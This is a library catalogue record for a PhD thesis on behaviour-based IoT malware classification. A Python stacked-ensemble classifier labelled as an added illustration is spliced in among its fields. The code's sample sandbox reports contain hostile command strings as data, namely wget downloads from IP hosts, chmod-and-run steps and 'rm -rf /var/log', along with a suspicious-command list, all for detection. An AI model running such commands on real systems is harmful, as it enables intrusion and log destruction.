000 02692nam a22001817a 4500
003 NUST
005 20260311125241.0
082 _a005.8,JAV
100 _aJaved, Sheikh Muhammad Zeeshan
_9133638
245 _aMachine Learning based Malware Classification Framework using Malware Behavior /
_cSheikh Muhammad Zeeshan Javed
260 _aRawalpindi,
_bMCS (NUST),
_c2026
300 _axvii, 132 p
505 _aMalware analysis is a critical component of modern cybersecurity, enabling the identification, understanding, and mitigation of malicious software. This dissertation investigates the evolution of machine learning–based approaches for large-scale, behavior-driven malware classification, with the objective of improving detection accuracy, scalability, and robustness across diverse computing platforms. Initially, this research presents a comprehensive review of existing machine learning–based malware detection and classification techniques, highlighting their strengths and limitations. Static analysis–based approaches, which extract features directly from executable files without program execution, have gained widespread adoption due to their low computational cost and ease of deployment. However, these methods are highly susceptible to obfuscation, packing, and evasion techniques. Dynamic analysis–based approaches, which examine malware behavior during execution in controlled environments, have been increasingly explored. Although dynamic analysis offers improved resilience against static evasion techniques, many existing approaches rely on a limited set of behavioral features, such as API call sequences. This narrow feature representation limits their ability to capture complex and evolving malware behaviors, thereby reducing classification performance and generalization in real-world, large-scale environments. Subsequently, this dissertation proposes a novel malware classification framework based on a stacked ensemble machine learning model that leverages large-scale IoT malware behavioral data. The proposed framework integrates multi-dimensional dynamic features, including memory dump characteristics, file system activities, network interactions, process behaviors, command executions, URL communications, and memory access patterns.
A key contribution of this work is its scalability and computational efficiency, which make it well-suited for deployment in resource-constrained IoT environments while achieving high classification accuracy.
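The abstract describes a stacked ensemble over several behavioral feature dimensions (file system, network, process, command, URL and memory). The block below is an added illustration of that architecture and is not the thesis's own code or data: the sandbox report format, the per-dimension feature definitions, the nearest-centroid base learners and the logistic-regression meta-learner are all assumptions chosen so the example runs on the standard library alone, and the training and test reports are constructed by hand. It shows the two stacking points the text refers to: one base learner per behavioral dimension, and a meta-learner trained on leave-one-out base scores so that a noisy dimension (here, connection counts) is down-weighted rather than voting with equal weight.

```python
"""Stacked ensemble over multi-dimensional dynamic (behavioral) features.
Added example, not the thesis's framework: report format, feature
definitions and learners are assumptions; all reports are constructed."""
import math
from urllib.parse import urlsplit

SUSPICIOUS_CMD = ("wget", "curl", "chmod +x", "rm -rf")   # assumed indicator list


def _is_ip_host(url):
    host = urlsplit(url).hostname or ""
    return host.replace(".", "").isdigit()          # IP-literal host, no DNS name


# One feature extractor per behavioral dimension; each yields a small numeric vector.
FEATURE_GROUPS = {
    "file": lambda r: [len(r["files"]), sum(p.startswith(("/tmp", "/etc")) for p in r["files"])],
    "net":  lambda r: [len(r["conns"]), len({port for _, port in r["conns"]})],
    "proc": lambda r: [len(r["procs"]), sum(p in ("sh", "busybox") for p in r["procs"])],
    "cmd":  lambda r: [len(r["cmds"]), sum(any(k in c for k in SUSPICIOUS_CMD) for c in r["cmds"])],
    "url":  lambda r: [len(r["urls"]), sum(_is_ip_host(u) for u in r["urls"])],
    "mem":  lambda r: [r["mem"]["rwx_regions"], r["mem"]["dump_entropy"]],
}


def report(label, files, conns, procs, cmds, urls, rwx, entropy):
    """Hypothetical sandbox-report shape (constructed for this example)."""
    return {"label": label, "files": files, "conns": conns, "procs": procs,
            "cmds": cmds, "urls": urls, "mem": {"rwx_regions": rwx, "dump_entropy": entropy}}


TRAIN = [  # constructed reports; label 1 = malware, 0 = benign
    report(1, ["/tmp/.x", "/etc/rc.local"], [("185.0.0.1", 23), ("185.0.0.1", 80), ("10.0.0.5", 23)],
           ["sh", "busybox", "wget"], ["wget http://185.0.0.1/bin -O /tmp/.x", "chmod +x /tmp/.x", "/tmp/.x"],
           ["http://185.0.0.1/bin"], 3, 7.6),
    report(1, ["/tmp/.a", "/var/run/.a"], [("45.1.1.1", 6667), ("45.1.1.1", 80)], ["sh", "busybox"],
           ["busybox wget http://45.1.1.1/x", "chmod 777 /tmp/.a", "rm -rf /var/log"], ["http://45.1.1.1/x"], 2, 7.2),
    report(1, ["/tmp/.b"], [("203.0.113.9", 443), ("203.0.113.9", 5555)], ["sh"],
           ["chmod +x /tmp/.b", "/tmp/.b"], ["http://203.0.113.9/b"], 4, 7.9),
    report(1, ["/etc/init.d/s", "/tmp/.c"], [("198.51.100.2", 23)], ["busybox", "telnetd"],
           ["wget http://198.51.100.2/c -O /tmp/.c", "/tmp/.c"], ["http://198.51.100.2/c"], 2, 7.4),
    report(0, ["/var/lib/app/state.db"], [("93.184.216.34", 443)], ["app"], [],
           ["https://updates.example.com/manifest"], 0, 4.1),
    report(0, ["/home/user/out.log", "/var/lib/app/cache"], [("93.184.216.34", 443), ("93.184.216.34", 443)],
           ["app", "logrotate"], ["logrotate /etc/logrotate.conf"], ["https://api.example.com/v1"], 0, 4.8),
    report(0, [], [], ["app"], [], [], 0, 3.9),
    report(0, ["/var/lib/app/state.db"], [("93.184.216.34", 443), ("93.184.216.35", 443)], ["app", "sh"],
           ["ls /var/lib/app"], ["https://cdn.example.com/pkg"], 1, 5.0),
]


def _centroid(vectors):
    return [sum(v[i] for v in vectors) / len(vectors) for i in range(len(vectors[0]))]


def _dist(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def base_score(vec, mal_vectors, ben_vectors):
    """Nearest-centroid base learner: 0 = at benign centroid, 1 = at malware centroid."""
    dm, db = _dist(vec, _centroid(mal_vectors)), _dist(vec, _centroid(ben_vectors))
    return db / (dm + db) if dm + db else 0.5


def level1(r, train, exclude=None):
    """Level-1 vector: one base score per behavioral dimension (exclude = leave-one-out)."""
    out = []
    for extract in FEATURE_GROUPS.values():
        mal = [extract(t) for t in train if t["label"] == 1 and t is not exclude]
        ben = [extract(t) for t in train if t["label"] == 0 and t is not exclude]
        out.append(base_score(extract(r), mal, ben))
    return out


def _sigmoid(z):
    return 1.0 / (1.0 + math.exp(-max(-60.0, min(60.0, z))))


def train_meta(train, epochs=500, lr=0.5):
    """Logistic-regression meta-learner fitted on leave-one-out base scores."""
    X = [level1(r, train, exclude=r) for r in train]
    y = [r["label"] for r in train]
    w, b = [0.0] * len(FEATURE_GROUPS), 0.0
    for _ in range(epochs):
        for xi, yi in zip(X, y):
            err = _sigmoid(sum(wj * xj for wj, xj in zip(w, xi)) + b) - yi
            w = [wj - lr * err * xj for wj, xj in zip(w, xi)]
            b -= lr * err
    return w, b


def classify(r, train, model):
    w, b = model
    p = _sigmoid(sum(wj * xj for wj, xj in zip(w, level1(r, train))) + b)
    return ("malware" if p >= 0.5 else "benign"), p


MODEL = train_meta(TRAIN)
TEST_MALWARE = report(1, ["/tmp/.z"], [("192.0.2.7", 23)], ["sh", "busybox"],
                      ["wget http://192.0.2.7/z -O /tmp/.z", "chmod +x /tmp/.z"], ["http://192.0.2.7/z"], 3, 7.5)
TEST_BENIGN = report(0, ["/var/lib/app/state.db"], [("93.184.216.34", 443)], ["app"],
                     ["ls /var/lib/app"], ["https://www.example.com/"], 0, 4.3)

if __name__ == "__main__":
    for name, r in (("unseen malware", TEST_MALWARE), ("unseen benign", TEST_BENIGN)):
        print(name, dict(zip(FEATURE_GROUPS, (round(s, 2) for s in level1(r, TRAIN)))), classify(r, TRAIN, MODEL))
```

The unseen malware report scores low on the network dimension (its single connection looks like the benign training reports) but high on the memory, URL, command and process dimensions; the meta-learner, having seen in the leave-one-out scores that the network dimension separates the classes poorly, still classifies it as malware. That is the practical argument for stacking over per-dimension learners rather than concatenating every feature into one vector or taking a flat vote.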
650 _aPhD Information Security Thesis
_9132793
651 _aPhD IS Thesis
_9132794
700 _aSupervised by Dr. Muhammad Faisal Amjad
_9133639
942 _2ddc
_cTHE
999 _c616601
_d616601